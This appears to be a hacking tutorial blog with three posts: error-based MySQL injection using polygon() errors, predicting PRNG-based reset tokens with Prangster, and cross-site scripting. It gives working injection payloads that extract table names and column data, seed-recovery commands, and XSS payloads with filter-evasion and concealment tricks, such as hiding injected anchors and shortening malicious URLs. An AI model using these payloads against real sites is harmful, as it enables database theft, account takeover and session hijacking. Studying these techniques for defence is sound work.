Monday, 17 November 2014

Error: You have SQLi in your polygons

An introduction to error based SQLi

In State of the Union I introduced the SQL injection attack vector and briefly described 3 basic types, error, union and blind. I've covered union based attacks in depth already, this post will introduce error based SQLi. For this tutorial I will assume you know the basics of SQL and SQLi already, if you don't please read State of the Union first.

Update - For anyone looking for a DIOS tutorial for error based injection then please check out my blog post here -


The principle of error based SQLi is the same as union based, an adversary supplies input to a web application which is used to build a query to execute against a database, by including SQL in the input you can alter the behaviour of the query and return data that is outside of the original scope. For example a search function to find news articles might be able to return information about the structure of the database and even specific fields such as passwords or other sensitive information.

In union based SQLi the attack methodology is to discover where data is being returned by the database to the visible portions of the web application and then union the existing result your own data. If the page only displays the first result in the final set you can alter the conditions under which the original data is selected to return zero results so the final set only contains your custom data.

Under some conditions this method may not work, here's a few examples.
  • If there's any kind of logic designed to check the input parameter is valid, this stops you from making the original select return zero results. If this is encountered in a web page that can only display a fixed number of results then your appended data is ignored.
  • If none of the results are returned to the screen directly, it's possible the results might be interpreted through some other logic first and not appear on the page as plain text but rather trigger some other change.
  • If the entry point of the injection is inside a nested query you might find that after enumerating the column count using ORDER BY that a UNION SELECT still throws an invalid column count, this is likely a nested select.
In these cases where you cannot return arbitrary data back to the screen you need to switch from union based SQLi to error based.

MySQL errors

MySQL errors can be suppressed however if they're enabled and the error message is returned to the screen anywhere on the web application you have another method of extracting data as the error message may contain parts of SQL statement and if part of the statement has already been evaluated it could reflect actual data from the database.

When the SQL server is presented with a query it will resolve the most nested parts first before evaluating the outwards until the whole query is finished or until it hits an error. This means if you nest a select statement inside some SQL designed to create an error, the data will be selected first and then returned to the screen inside the error message. This is the basic attack methodology of error based SQLi.

Geometric SQLi

There are numerous ways of performing error based SQLi, one recently discovered method involves using the geometric functions built into MySQL. Polygon() allows you to define a polygon given a series of vertices or points, points are defined as a pair of X,Y coordinates using double-precision for example 

point(10.75, 21.37)

Polygons are defined as a series of points for example

polygon((0 0, 1 1, 2 2, 3 3, 4 4),(5 5, 6 6, 7 7, 8 8, 9 9))

If you provide some malformed data such as


You'll get an error something like this:

Unknown error: 1367 (Illegal non geometric '1' value found during parsing).

Note that the value '1' is reflected back in the error message. Let's try selecting something that requires the SQL server to evaluate data from the database such as the version variable.

polygon(select @@version)

Unfortunately this gives us the following error:

Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select @@version)

Let's instead try selecting the version into a temporary table which we'll call 'a' and then select the value from that, for example:

polygon(select * from(select @@version)a)

Now we get the error message:

Unknown error: 1367 (Illegal non geometric '(select `a`.`@@version` from (select @@version AS `@@version`) `a`)' value found during parsing).

This is closer to what we need, we're selecting the version number correctly, it's being evaluated by the SQL server, however the actual value is not being returned in the error message, instead it's returning the default column name of the temporary table, when not explicitly stated the default name is the first value in the results. We can repeat this trick and nest this in yet another select for example:

polygon((select * from (select * from (select @@version)a)b))

Now we're selecting the value from the temporary table 'a' into a new temporary table 'b', this forces the value in table 'a' to be evaluated, now when we get an error it contains the real version number. When doing embedded or nested selects in SQL the inner most selects are evaluated first so the values can be used by the outer selects, if the value you're trying to extract using SQLi hasn't evaluated in the error message, simply use this trick of selecting the value twice. The error should now look something like this:

Unknown error: 1367 (Illegal non geometric '(select `b`.`@@version` from (select '5.50.00' AS `@@version` from dual) `b`)' value found during parsing).

You'll now notice that in the error message we now have legible data pulled from the server, we've selected the MySQL version 5.50.00. How does this look in a fictional example, assume the following page parameter exists (the green text is the static part of the URL, red is the user supplied input)


We can exchange the value of 50 for the parameter news_id, which looks like this:

URL * from (select * from (select @@version)a)b))

Selecting data

You can extend this basic concept with any arbitrary SQL, so all the same tricks to map out the database and select data work as you'd expect, for example if you want to select a list of tables from the default schema:

URL * from (select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a)b))

To find the columns inside these tables you can use the following where TBLNAME is the name of the table you're interested in. Remember to Hex encode the value.

URL * from (select * from(select group_concat(column_name) from information_schema.tables where table_name=TBLNAME))a)b))

And finally to select data:

URL * from (select * from(select group_concat(0x0a,COLUMN1,0x3a,COLUMN2,0x3a,COLUMN3) from TBLNAME)a)b))

Any feedback both positive and negative is welcomed, please leave a comment if you spot any errors or have any questions. Please do not post real world examples as they will be deleted, all questions should focus on the theory only, thank you.

Greetz to benzi who taught me this.

Monday, 3 November 2014

PRNG and other Batman fight noises

An introduction to PRNGs and why they're bad for security.

You may have heard that Pseudo Random Number Generators (PRNGs) are an unsafe source of randomness for security related purposes, and if you're like me you may have struggled to understand how this could lead to a practical attack against applications that use PRNGs. This tutorial will explain why PRNGs are bad and demonstrate a practical attack against them.

What is a PRNG?

The first thing to understand about Pseudo Random Number Generators is that they're completely deterministic, this means that given the same starting conditions they will always produce the same string of "random" numbers. However they do appear random to the human eye, they're superficially unpredictable and they give an even distribution of numbers across a significantly large output.

PRNGs are seeded which means the random function is initialised with some initial value (the seed) and this decides what the random sequence will be, if you seed a PRNG with the same value you get the same series of random numbers, this series eventually repeats itself, the number of outputs before repetition occurs is called the period. The seed can sometimes be specified and in some languages the default seed will take information from the system such as the time or the system process ID.

PRNGs are typically used in applications where behaviour only needs to superficially appear random and it's not important that attackers are able to predict future values, typically they're built for speed and so can be used in real time simulation such as video games that need some degree of apparent randomness. This is very important because any function that is built around performing quickly can also be brute forced quickly.

It's worth noting at this stage that the seed values and the internal state of the PRNG can be different sizes, typically measured in bits. Because the initial state of the PRNG is decided by the seed the number of states that can be generated is limited by the total number of unique seeds. A PRNG with a large internal state of thousands of bits but with only a 32bit seed will only realise a small fraction of the total number of possible internal states.

It gets even worse when you consider that an initial seed may not come from a source that contains 32bits worth of unique information, something like a time stamp or a process ID is typically even smaller, thus reducing the number of possible states of the PRNG can produce to be much smaller than internally it's capable of generating.

How are random numbers used.

Typically random numbers are manipulated through some process to make the range of possible values fit the desired output, for example if you want a percentage output you'd normalize the random output into a range between 0 and 100, this is commonly done by restricting the range of the output of the PRNG to a variable of type float, between 0 and 1, then multiplying the float by whatever value you need to achieve the desired range, in the case of a percentage this would be x100, in the case of needing a random letter you'd multiply this by x25, this gives you 26 values between 0 and 25, you can then map each number to a letter to get plain text output derived from the numbers. Characters is often how the numbers are actually presented to the user in the form of some kind of security token, you'll find these being used for password reset tokens and CSRF tokens.

Attack theory

The basic theory behind attacks fall into two categories.

Firstly is that if you know the PRNG being used and you can determine the seed value then you're able to generate the entire string of random numbers, you can then compare some sample of random output from the application and determine where in the current series the application is and use that to generate the future random values. For practical attacks against PHP applications using these methods I'd highly recommend this talk from Blackhat 2012 by George Argyros and Aggelos Kiayias from the University of Athens.

In the cases where the seed is unknown you can use brute force attacks, you sample some output of the application you wish to attack, you run them backwards through the same maths that processed the random value into something useful, and you determine what the seed is. From there you follow the same process of generating all values for that seed and working out the current applications place in the series, again allowing you to predict future outputs. For practical attacks against many different types of PRNGs using this method I'd also recommend this talk from Blackhat 2013 Derek Soeder, Christopher Abad and Gabriel Acevedo of You can also find their white paper here.

Introducing Prangster

In the talk at Blackhat 2013 that I previously mentioned, a proof of concept tool was released called Prangster, you can download it here, it's open source and written in C#. They include instructions for compiling it on the website, it requires windows and Microsoft .NET 2.0, or can be built with Mono for Linux/Mac.

The attack methodology is quite straight forward.

1) Find an application that creates some kind random output, this could be something like a security token used to reset passwords or account credentials.

2) Collect samples, you need to distinguish between static parts of the output and the parts which are pseudo random, for example if you're analysing randomly generated passwords and each password contains some static component then ignore that. Try and determine a unique list of all characters used in the output, is it lower case alpha only, is it alpha-numeric, etc. This is needed later to build an alphabet.

3) Determine the type of PRNG being used, often this can be done by determining the platform which the application runs on, if it's ASP.NET for example then there's a good chance the Microsoft random() class is being used. You also need to guess how the PRNG maps the output in numbers to the characters you see in your output, if the application is open source or the source code is available you can determine this directly, otherwise it's best guess.

4) Use Prangster to analyse the samples you've recovered, determine the seed that created this string of random numbers, then use this seed to generate all the random numbers the application is using, and use that to predict future randomness.


Once compiled you can run Prangster from the command line, it has 3 basic modes you can use.

r - Recovers the seed that generate the input. It requires the PRNG type as a parameter, a string of output that you're sure was generated in that order, and an alphabet. The alphabet is the mapping of numbers to characters, for something simple like an output that only contains lower case alpha your alphabet would probably look something like this "abcdefghijklmnopqrstuvwxyz". If you're lucky this will return the seed value used to generate the random series.

g - Reproduces a series of outputs given a specific seed and a length of outputs, it takes parameters of the PRNG type, the alphabet, the seed value (learnt from -r) and the length of output you wish to generate.

s - Seeks a series given some initial seed and an offset, then returns the seed which represents the new state, it takes the parameters for the PRNG type, the seed value and the offset amount.

If you run Prangster without any parameters it will echo the usage to the screen.


Let's consider an example, let's say we're attacking an ASP.NET application which is generating unique password reset tokens and these tokens appear to use upper and lower case characters only, you might try the following commands in Prangster

<some collected output> | Prangster.exe r PrngDotNet abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

If this didn't get you a result, it's possible the alphabet is wrong, this is just best guess on how the developers mapped the random() output to readable characters, it could be reversed, for example
<some collected output> | Prangster.exe r PrngDotNet ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz

Some trial an error is likely to be required, especially if you do not have access to the source code, luckily Prangster runs quite quickly in most circumstances allowing you to try multiple alphabets quite quickly. If my explanation of Prangsters usage is hard to follow then I suggest watching them demo a real attack scenario in their Blackhat presentation starting at 32:40.

A final note of respect to the team at Cylance who put this together, this is an impressive tool which can predict randomness in many applications by simply analysing the output of those systems, in this respect it's completely black box analysis. Their white paper goes in to more depth about the optimisations they used to speed up brute force attacks which can be found here.


This section is an update to this post to elaborate on the mitigation for these attacks. The solution is simple and it's mainly through ignorance it's not used more often, there is already a class of RNGs that produce Cryptographically secure random numbers (CSRNGs), Linux comes with dev/random and dev/urandom which get their randomness straight from the Linux kernel. The kernel has access to various devices attached to the system through the device drivers, this allows collection of envionmental noise which becomes the source of random number generation, rather than a static list. In windows the equivalent is CryptGenRandom.


Cross Site Scripting

This tutorial will introduce you to Cross Site Scripting or XSS for short.

Introduction to XSS

XSS is a vulnerability in web applications which allows an attacker to inject JavaScript in to a page which then executes inside the browser of another user. It's a very powerful attack since JavaScript can access a lot of information about the clients browser and even modify the DOM (Document Object Model) of the page which can alter the look and behaviour, as well as make requests to the website on behalf of the user and modify responses, because the script can run silently these kind of attacks are deadly for stealing personal information.

One common attack is session hijacking where the value of the users session cookies are stolen and can be sent to an attacker who can use it to bypass log in/security that relies on cookies to identify and authenticate users.

The basics

The anatomy of an XSS attack is for an attacker to supply input to a web service which is then returned to the page for others to see. There's 2 basic methods of doing this, persistent and reflected.

A persistent XSS attack sends a payload to the web application which stores that input in permanent storage server side, typically a database. When other users make requests to the web server the reply includes the payload. For example the comments section for a blog post, users can provide text input plus their XSS payload that is stored in a database and every user who visits that page loads the comment along with any script. This is a broad attack that can target many users at once.

A reflected XSS attack injects script in to the page parameters of a URL, the server responds with the script somewhere in the response, this is a one time targeted attack that only affects the users who follow that specific URL. The attacker then distributes the custom malicious URL to targets either directly by sending it to them or the by publishing the link somewhere on the web and hoping users click on it. A good example of a reflected attack is a search feature on a web application which creates a GET request that includes the user's search term as a page parameter and returns search results plus the payload.

Just like with SQLi attacks, not all sites are vulnerable to XSS, only sites which are badly written and contain vulnerable parameters or inputs can be attacked.

Context matters

Web applications have a page life cycle which all requests go through, during this process user input passes through several different interpreters each have a set of characters that have special meaning in that context. XSS vulnerabilities exist when user input is allowed to pass into the body of HTML while containing characters that have special meaning in this context.

To stop XSS attacks the users input must be HTML encoded before being inserted into a HTML document, this type of encoding takes all special characters and alters them to be a safe equivalent which display correctly when rendered by the browser but cannot modify the mark up. For PHP use htmlspecialchars() documented here and for ASP.NET use htmlencode() document here.

This isn't the whole story however, if user input is inserted directly inside existing JavaScript for example inside a <script> tag, or inside any event or evaluation that runs JavaScript then HTML encoding may not be sufficient.

For more on prevention see XSS prevention cheat sheet.

Finding vulnerabilities

To find XSS vulnerabilities you need to test all user input to the web application and check all the places in the HTML response this input appears, this may require viewing the source code as not all occurrences may be visible or obvious. For example you might submit your name to website profile page which appears as both text on the page but it might also appear as the alt attribute for your profile image tag, this wouldn't be immediately obvious just looking by eye. The best trick is to use test input that's unique and wont appear anywhere else on the page and you can search for it (ctrl+f) in the source code.

There are 3 basic types of user input:

  • Page parameters passed in the URL of a HTTP GET request.
  • Parameters passed in the body of a HTTP POST request.
  • External resources the web server fetches.

URL parameters 

Page parameters are passed in the URL of a HTTP GET request, these are typically used to modify the result of the response you'll get from the server, this type of input is used to create reflected XSS attacks. For testing simply use a browser and enter different input directly into the URL inside of parameters. If there's any characters you need to URL encode you can use this XSS calculator.

Note that Internet Explorer and Chrome both have XSS prevention built into the browser which examines parameters inside the URL and looks for common XSS vectors, they will find most attempts to enter <script> tags and other basic attacks, however more subtle XSS vectors may get through. Because of this it's best to use Firefox for testing exploits first and then adapting or obfuscating the attacks for other browsers as necessary.

Another reason I recommend Firefox for testing is because when you view the source of the document you see the raw source, in both Internet Explorer and Chrome any HTML encoded characters appear as the user friendly variants. So you cannot tell the difference between a raw angle bracket < and the HTML encoded equivalent &lt. This may lead to confusion where apparently correctly HTML is not rendering as you'd expect, in Firefox this is not a problem.

POST parameters

Posts parameters are passed to the server when you submit a form on the page causing a HTTP POST, they are passed back in the body of the page request and as such cannot be used for reflected attacks since you cannot remotely cause post backs.

There may be client side data validation done on a page in JavaScript before it will allow you to submit a form, there are different ways to bypass this, you can modify the JavaScript running in the page manually using developer tools, or you can send your HTTP POST requests through a local proxy which can intercept and modify them in transport.

Some good examples of proxies for penetration testing are Paros for Windows as well as a newer and better maintained fork called ZAP, or if you're running Linux Burp suite is popular. You need to configure and run the proxy, normally configured on the same machine as the browser. Then change your browser settings to send requests through the proxy, in Firefox open the options, switch to the "Advanced" section, select the "Network" tab, and under Connection click the "Settings..." button. Now set "localhost" or "" as the HTTP proxy and set the port you've configured your proxy to use, most default to 8080. Make sure to tick "Use this proxy server for all protocols" and OK all the windows.

Now you can capture and modify page requests, these are helpful tools not just because you can bypass client side filtering but because you're no longer limited to basic text input, you can modify everything posted back to the server. This increases the number of possible attack vectors significantly, for example if the site allows uploading of files you can upload a normal jpg file in the browser then proxy the request and change the file name/extension as well as include characters that wouldn't normally be part of legal file name. In this example if this file name is inserted into a database and later used on a page somewhere it could potentially be used to create XSS attacks that otherwise aren't possible using just the browser by itself.

External resources

Some web applications make requests for resources on other servers, they may crawl another web page or source of data and then inject this into their own database to be used as part of the content for a page. If the source of the data is something you can control or if you can send the target web server some input that makes it visit resource you're in control of, this becomes another attack vector for XSS.

A real world example I've used during testing abused a flaw in a feature to allow users to share URLs with each other. The behaviour of the target website was to take user input, visit the URL, scrape the page to find the page title and then use this as the display text for the URL. Note that the URL input itself wasn't vulnerable to XSS as the correct characters were filtered out, however the page title scraped from the external resource was vulnerable to XSS.

Keep this in mind when testing, it's not just direct user input to a web application that might be vulnerable, but any kind of source of 3rd party data. A clever variant of this was done recently using XSS inside TXT records in DNS to inject any website displaying Whois information without first HTML encoding the record.


In the real world the type of XSS vector you can use will vary greatly depending on how the output back to the page is handled and where the output is injected in to. The output may be modified in one of several different ways, some common ones are:

  • Removing specific characters that aren't allowed.
  • Removing specific words or strings of characters that aren't allowed.
  • Replacing unsafe characters with the HTML safe equivalents using HTML encoding.
  • Denying the entire string altogether or throwing an error.
  • Inserting other characters to break up words that aren't allowed.
Because the number of different XSS attack vectors is so staggeringly vast most of these techniques allow through at least some types of attack, the safest is HTML encoding but as mentioned previously this may not stop attacks where the output is injected directly inside of existing JavaScript.

You can break down the attacks in to 2 basic types, those which are injected into the body of the document, and those which are inserted into the mark up of the document. All examples given below show existing HTML in green and user input in red.

For user input that is inserted in to the body of the document you need to escape back into mark up in order to inject any kind of JavaScript, this requires using angle brackets < and >. In the example below the output is injected between div tags.


For user input that is inserted directly into parts of the mark up, for example inside the alt attribute of an image tag, then you only need escape the attribute using quotes ". In the example below I've added an event which triggers when the image has loaded, no angle brackets are required because our injection point is already inside the mark up.

test" onload="alert(1);
<img src="/images/logo.jpg" alt="test" onload="alert(1);" />

Persistent attack Examples

There are too many different XSS attack vectors to mention them all in detail, for a cheat sheet list of many of the common techniques I highly suggest the cheat sheet. However I will cover a few basic persistent attacks to demonstrate the principles.

Basic injection into image location:

<img src="javascript:alert(1);">

Modern browsers have a much more relaxed parsing engine which can allow for mistakes in HTML to render correctly, as such you can often remove some formatting, these tricks are often browser specific depending on how strict the rendering engine is, this example doesn't require quotes of semicolon:

<img src=javascript:alert(1)>

Here's a slightly more complex fictional example, lets say you can sign up for a website and pick a user name, you're given your own profile page on the website which ends in your profile name.

Profile Name

This could be a good and somewhat obscure attack vector, If the site programmatically creates anchor tags anywhere to link to your profile they might look like this:

<a href="/userprofile/Frosty">Visit profile</a>

The right user name might result in JavaScript execution, in this case by injecting an event into the attribute. If the mouse is moves over the anchor tag then it will fire the JavaScript.

Frosty" onmouseover="javascript:alert(1);
<a href="/userprofile/Frosty" onmouseover="javascript:alert(1);" />Visit profile</a>

Reflected attack examples

A very common reflected attack can be found in many search features, a user enters some text to search and clicks search, that creates a GET request to the server for the search results page and inside that request is a page parameter which contains the search term. A fictional example:


This takes the parameter called search, with the value of usersearch, In the results page you'll find HTML that looks something like this:

<p>Your result for usersearch returned 0 results</p>

You can create a malicious URL like the following

<p>Your result for <script>alert(1)</script> returned 0 results</p>

Sending this URL to a target and have them follow it will inject JavaScript into the results page. Only the users following that specifically crafted URL will be effected.

To tidy up long or complex reflected attacks you might want to use URL shortening services like Bitly or TinyURL.

Tidying up

In some cases you might want to escape out of some input but by doing so leave behind invalid HTML which creates rendering errors on the page, there's nothing to stop you from including additional HTML and CSS in your input to correct these. In a previous examples we used the onmouseover() event, however if this has already been defined in the tag we'll have a problem. Consider the following:

Frosty" onmouseover="javascript:alert(1);
<a onmouseover="changecursor()" href="/userprofile/Frosty" onmouseover="javascript:alert(1);">Visit profile</a>

Because our attribute came second it wont fire, if angle brackets are allowed in the user name we could just escape out of the entire anchor tag.

<a onmouseover="changecursor()" href="/userprofile/Frosty"><script>javascript:alert(1)</script>">Visit profile</a>

However this will look messy on the page and possibly alert people something is wrong, this is an instance where you might want to tidy up your XSS attack, create matching tags in order to create a 2nd valid anchor tag and then hide it by setting visibility using CSS.

Frosty">Visit Profile</a><script>javascript:alert(1)</script><a style="visibility:hidden;
<a onmouseover="changecursor()" href="/userprofile/Frosty">Visit Profile</a><script>javascript:alert(1)</script><a style="visibility:hidden;">Visit profile</a


In many cases beating blacklist filters is simply a matter of obfuscation, for example adding character to break up key words like "javascript" such the tab character or new line characters are good for this:

<img src="jav ascript:alert(1);">

<img src="jav&#x09;ascript:alert(1);">

You can often use different encoding types, in the URL you can supply URL encoded characters, an extremely helpful tool for calculating obfuscations can be found here